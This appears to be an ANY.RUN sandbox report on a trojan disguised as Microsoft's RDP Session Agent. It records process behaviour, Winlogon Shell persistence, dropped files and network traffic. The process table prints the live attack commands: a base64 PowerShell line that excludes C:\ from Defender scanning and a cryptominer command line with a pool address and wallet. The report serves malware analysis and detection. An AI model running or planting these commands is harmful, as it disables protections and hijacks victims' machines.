analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe

Full analysis: https://app.any.run/tasks/b97a9994-3802-4ebe-9074-2fbcb4e7048e
Verdict: Malicious activity
Analysis date: July 22, 2024, 15:14:56
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
upx
Indicators:
MIME: application/x-dosexec
File info: PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
MD5:

2CA5492F9DBCDAAB3FACF1768CAE5C6D

SHA1:

1AA94BEA1A57F4D6933258BAF9E5D6A17B332ED7

SHA256:

1428EFF0019BA3999EFDB4ED6E95B1F7DB19B44B758C6E25741C6966692FC130

SSDEEP:

98304:B6GMWWCdl6k1/ZznpySti7vsEzz58ys5FNDFY7N/978+jf+T+MSvy6MCMx8WNRT7:pAoicm/B1

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
      • RegAsm.exe (PID: 7240)

    • Changes the login/logoff helper path in the registry

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)

    • Starts a Microsoft application from unusual location

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)

    • Reads security settings of Internet Explorer

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
      • RegAsm.exe (PID: 7240)

    • Starts CMD.EXE for commands execution

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)

    • Reads the date of Windows installation

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
      • RegAsm.exe (PID: 7240)

    • BASE64 encoded PowerShell command has been detected

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)

    • Starts POWERSHELL.EXE for commands execution

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)

    • Base64-obfuscated command line is found

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)

    • Executable content was dropped or overwritten

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
      • RegAsm.exe (PID: 7240)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 7032)

    • Executes application which crashes

      • Roamingsigverif.exe (PID: 1596)

  • INFO

    • Checks supported languages

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
      • RegAsm.exe (PID: 7240)

    • Reads the computer name

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
      • RegAsm.exe (PID: 7240)

    • Reads the machine GUID from the registry

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)

    • Process checks computer location settings

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6148)
      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
      • RegAsm.exe (PID: 7240)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7032)

    • Creates files or folders in the user directory

      • 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe (PID: 6976)
      • RegAsm.exe (PID: 7240)
      • WerFault.exe (PID: 3944)

    • UPX packer has been detected

      • RegAsm.exe (PID: 7240)

    • Checks proxy server information

      • slui.exe (PID: 1288)

    • Reads the software policy settings

      • slui.exe (PID: 1288)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic Win/DOS Executable (50)
.exe | DOS Executable Generic (49.9)

EXIF

EXE

AssemblyVersion: 10.0.17763.1
ProductVersion: 10.0.17763.1
ProductName: Microsoft® Windows® Operating System
OriginalFileName: Mfceum-4.exe
LegalTrademarks: -
LegalCopyright: © Microsoft Corporation. All rights reserved.
InternalName: Mfceum-4.exe
FileVersion: 10.0.17763.1
FileDescription: RDP Session Agent
CompanyName: Microsoft Corporation
Comments: RDP Session Agent
CharacterSet: Unicode
LanguageCode: Neutral
FileSubtype: -
ObjectFileType: Executable application
FileOS: Win32
FileFlags: (none)
FileFlagsMask: 0x003f
ProductVersionNumber: 10.0.17763.1
FileVersionNumber: 10.0.17763.1
Subsystem: Windows GUI
SubsystemVersion: 4
ImageVersion: -
OSVersion: 4
EntryPoint: 0x0000
UninitializedDataSize: -
InitializedDataSize: 69120
CodeSize: 6704128
LinkerVersion: 48
PEType: PE32+
ImageFileCharacteristics: Executable, Large address aware
TimeStamp: 2022:09:19 14:55:19+00:00
MachineType: AMD AMD64
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
151
Monitored processes
11
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe no specs cmd.exe conhost.exe no specs 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe powershell.exe no specs conhost.exe no specs THREAT regasm.exe slui.exe roamingsigverif.exe conhost.exe no specs werfault.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
6148"C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe" C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
RDP Session Agent
Exit code:
0
Version:
10.0.17763.1
Modules
Images
c:\users\admin\desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
6876"C:\Windows\System32\cmd.exe" /k START "" "C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe" & EXITC:\Windows\System32\cmd.exe
1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
8180\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6976"C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe" C:\Users\admin\Desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
RDP Session Agent
Exit code:
0
Version:
10.0.17763.1
Modules
Images
c:\users\admin\desktop\1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
7032"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
5464\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft .NET Assembly Registration Utility
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\regasm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
1288C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1596"C:\Users\admin\AppData\Roamingsigverif.exe" --algo EQUI144_5 --pers BgoldPoW --pool btg.2miners.com:4040 --user GLW2ipMiWNpeMAnrh2sW9pZ6rBo65GzY1r.Rig --log off pauseC:\Users\admin\AppData\Roamingsigverif.exe
RegAsm.exe
User:
admin
Integrity Level:
HIGH
Exit code:
3221225477
Modules
Images
c:\users\admin\appdata\roamingsigverif.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
884\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeRoamingsigverif.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
17 966
Read events
17 914
Write events
47
Delete events
5

Modification events

(PID) Process:(6148) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(6148) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(6148) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(6148) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(6976) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(6976) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(6976) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(6976) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(6976) 1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Operation:writeName:Shell
Value:
explorer.exe,"C:\Users\admin\AppData\Roaming\SystemNaknik\Nanik.exe",
(PID) Process:(7240) RegAsm.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
Executable files
2
Suspicious files
3
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
3944WerFault.exeC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Roamingsigverif._66f25098356f7f52a4e075b57a8aebce9f615f7_ca662a69_c612c3cc-6743-4773-93f8-e23c9a29769d\Report.wer
MD5:
SHA256:
3944WerFault.exeC:\Users\admin\AppData\Local\CrashDumps\Roamingsigverif.exe.1596.dmp
MD5:
SHA256:
3944WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WERD0AA.tmp.xmlxml
MD5:CBD13A519A80BD52B3AF9386DDB1F023
SHA256:40C11D8BBACF236568C5B012D829ED6DB275101249628037B8EF8F5D6120247B
3944WerFault.exeC:\WINDOWS\AppCompat\Programs\Amcache.hvebinary
MD5:E365D7D9F6602071C717907929378F50
SHA256:2C31745D7CA5677E973A41635246C9059813AF48EB4B0A7E9A5817B9D5EC4230
3944WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WERD069.tmp.dmpbinary
MD5:B034C4B81EA7504DCF8DD7B6BAB5B5B5
SHA256:F4B17E156E23527EAB02FC137DA53AFFDAE3DC527A8596C6DCAA740468F4AD46
3944WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WERD099.tmp.WERInternalMetadata.xmlxml
MD5:D3ADB0C168CFA435ED762A0A77C32A4C
SHA256:BCF64DECE86B2E1EDD067682D919C58BB63DF209D7E31CE2DA01C005E8C9CC41
7032powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:33F9F4F94DCD09FA4B2CBC0D548A56AA
SHA256:099914A0200B9C1913C98776287829369DAF37B66511C915634D09F861B8B234
7240RegAsm.exeC:\Users\admin\AppData\Roamingsigverif.exeexecutable
MD5:73278D880B15CC091A24498E5E435AD8
SHA256:AC63628939F91B381816DCFE792B123DF57A589C0365D4BB10BFFE0F6645D026
7032powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v1er4xbn.qel.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
69761428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exeC:\Users\admin\AppData\Roaming\SystemNaknik\Nanik.exeexecutable
MD5:2CA5492F9DBCDAAB3FACF1768CAE5C6D
SHA256:1428EFF0019BA3999EFDB4ED6E95B1F7DB19B44B758C6E25741C6966692FC130
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
40
DNS requests
14
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
13.85.23.86:443
https://slscr.update.microsoft.com/sls/ping
unknown
GET
304
13.85.23.86:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
GET
304
13.85.23.86:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
GET
200
20.3.187.198:443
https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping
unknown
GET
304
52.165.165.26:443
https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
POST
20.190.160.14:443
https://login.live.com/RST2.srf
unknown
GET
200
52.165.165.26:443
https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
GET
200
52.165.165.26:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
compressed
23.9 Kb
POST
401
4.208.221.206:443
https://licensing.mp.microsoft.com/v7.0/licenses/content
unknown
binary
340 b
POST
500
20.83.72.98:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4716
svchost.exe
20.190.159.23:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
5620
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
4032
svchost.exe
239.255.255.250:1900
whitelisted
7856
svchost.exe
4.208.221.206:443
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
2760
svchost.exe
40.115.3.253:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1140
RUXIMICS.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4308
SIHClient.exe
52.165.165.26:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
5620
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown

DNS requests

Domain
IP
Reputation
login.live.com
  • 20.190.159.23
  • 20.190.159.68
  • 20.190.159.2
  • 40.126.31.69
  • 20.190.159.73
  • 40.126.31.71
  • 40.126.31.67
  • 20.190.159.71
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
  • 51.124.78.146
  • 40.127.240.158
  • 4.231.128.59
whitelisted
google.com
  • 142.250.186.110
whitelisted
slscr.update.microsoft.com
  • 52.165.165.26
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted
licensing.mp.microsoft.com
  • 4.209.33.156
whitelisted
activation-v2.sls.microsoft.com
  • 20.83.72.98
whitelisted
client.wns.windows.com
  • 40.113.110.67
whitelisted

Threats

PID
Process
Class
Message
Generic Protocol Command Decode
SURICATA HTTP Request unrecognized authorization method
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
1428eff0019ba3999efdb4ed6e95b1f7db19b44b758c6e25741c6966692fc130.exe